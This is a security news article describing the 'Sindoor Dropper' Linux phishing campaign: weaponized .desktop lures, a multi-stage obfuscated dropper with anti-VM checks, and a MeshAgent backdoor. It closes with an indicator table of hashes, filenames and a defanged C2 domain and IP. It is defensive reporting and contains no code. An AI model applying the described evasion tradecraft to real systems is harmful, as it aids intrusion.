A new malware campaign, dubbed “Sindoor Dropper,” is targeting Linux systems using sophisticated spear-phishing techniques and a multi-stage infection chain.
The campaign leverages lures themed around the recent India-Pakistan conflict, known as Operation Sindoor, to entice victims into executing malicious files.
This activity’s standout feature is its reliance on weaponized .desktop files, a method previously associated with the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.
The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a standard PDF document.
According to Nextron system analysis, upon execution, it opens a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex, heavily obfuscated infection process in the background.
This process is designed to evade both static and dynamic analysis, with the initial payload reportedly having zero detections on VirusTotal at the time of its discovery.
‘Sindoor Dropper’ Malware Targets Linux Systems
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine to make the binary executable again.
This kicks off a multi-stage process where each component decrypts and runs the next. The chain includes basic anti-virtual machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, enabling them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actor tradecraft, demonstrating a clear focus on Linux environments, which phishing campaigns have less targeted.
IOCs for Sindoor Dropper
| IOC Type | Indicator | Description |
|---|---|---|
| File Hash | 9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59 |
Initial phishing payload (Note_Warfare_Ops_Sindoor.pdf.desktop) |
| File Hash | 9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b |
Decrypted AES decryptor (mayuw) |
| File Hash | 0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23 |
Stage 2 downloader (shjdfhd) |
| File Hash | 38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4 |
Stage 3 downloader (inter_ddns) and the decrypted MeshAgent payload (server2) |
| File Hash | 05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8 |
MeshAgent final payload (server2) |
| File Hash | ba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97 |
Decoy PDF document (/tmp/Note_Warfare.pdf) |
| Filename | Note_Warfare_Ops_Sindoor.pdf.desktop |
The initial weaponized .desktop file used for phishing |
| Filename | /tmp/Note_Warfare.pdf |
The benign decoy document displayed to the victim |
| Filename | mayuw |
AES decryptor payload |
| Filename | shjdfhd |
Encrypted Stage 2 downloader |
| Filename | access |
AES decryptor for the next stage |
| Filename | inter_ddns |
Stage 3 downloader |
| Filename | server2 |
The final MeshAgent payload |
| Network | wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx |
Command-and-control (C2) server URL for the MeshAgent payload |
| Network | indianbosssystems.ddns[.]net |
Malicious C2 domain |
| Network | 54.144.107[.]42 |
IP address of the C2 server, hosted on AWS |
By combining timely, region-specific social engineering with advanced evasion techniques, the attackers increase their likelihood of successfully compromising sensitive networks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Source link
